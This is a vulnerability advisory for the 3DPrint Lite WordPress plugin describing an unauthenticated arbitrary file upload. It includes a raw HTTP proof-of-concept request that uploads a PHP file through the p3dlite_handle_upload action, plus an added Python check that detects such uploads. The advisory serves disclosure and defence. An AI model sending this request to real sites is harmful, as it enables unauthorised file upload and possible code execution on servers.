WordPress Plugin Vulnerabilities

3DPrint Lite < 1.9.1.5 - Unauthenticated Arbitrary File Upload

Description

The plugin performs no authorisation check and does not validate the uploaded file in its p3dlite_handle_upload AJAX action, allowing unauthenticated users to upload arbitrary files to the web server. However, a .htaccess file is present that prevents the uploaded file from being accessed on web servers such as Apache.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353
Content-Length: 366
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="action"

p3dlite_handle_upload
-----------------------------54331109111293931601238262353
Content-Disposition: form-data; name="file"; filename="a.php"
Content-Type: text/php

<?php echo 'Failed'; ?>
-----------------------------54331109111293931601238262353--
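
A request-inspection check for the upload shown above, as an added Python example (not code from the advisory or the plugin): it parses a multipart body posted to admin-ajax.php and, when the action is p3dlite_handle_upload, flags file parts with a script extension or a PHP open tag. The extension list, function names, the `query_action` parameter and the sample body builder are assumptions constructed for illustration.

```python
from email.parser import BytesParser

ACTION = "p3dlite_handle_upload"  # AJAX action named in the advisory
# Assumption: extensions the server may hand to PHP; adjust to the handler config.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}


def parse_multipart(content_type, body):
    """Return (field name, filename or None, payload bytes) for each form part."""
    head = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n"
    msg = BytesParser().parsebytes(head + body)
    if not msg.is_multipart():
        return []
    return [(part.get_param("name", header="content-disposition"),
             part.get_filename(),
             part.get_payload(decode=True) or b"")
            for part in msg.get_payload()]


def is_script_name(filename):
    """True if any extension segment is script-like: a.php, A.PHP, a.php.jpg, 'a.php.'"""
    segments = filename.lower().rstrip(". ").split(".")[1:]
    return any(seg.strip() in SCRIPT_EXTS for seg in segments)


def inspect_request(content_type, body, query_action=""):
    """Findings for one POST to /wp-admin/admin-ajax.php (action may be in URL or body)."""
    parts = parse_multipart(content_type, body)
    actions = {query_action} | {payload.decode("latin-1").strip()
                                for name, filename, payload in parts
                                if name == "action" and filename is None}
    if ACTION not in actions:
        return []
    findings = []
    for name, filename, payload in parts:
        if filename is None:
            continue
        if is_script_name(filename):
            findings.append(f"script extension: {filename}")
        if b"<?php" in payload.lower():
            findings.append(f"PHP open tag in: {filename}")
    return findings


def sample_body(boundary, filename, content, action=ACTION):
    """Constructed sample request body in the shape of the PoC above."""
    lines = [f"--{boundary}", 'Content-Disposition: form-data; name="action"', "", action,
             f"--{boundary}",
             f'Content-Disposition: form-data; name="file"; filename="{filename}"',
             "Content-Type: application/octet-stream", "", content, f"--{boundary}--", ""]
    return "\r\n".join(lines).encode("latin-1")
```

The check only inspects the request; it does not replace updating to the fixed version listed below.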

Affects Plugins

Fixed in 1.9.1.5

References

Exploitdb

Miscellaneous

Original Researcher: Spacehen
Verified: Yes

Timeline

Publicly Published: 2021-09-23
Added: 2021-09-23
Last Updated: 2024-02-05
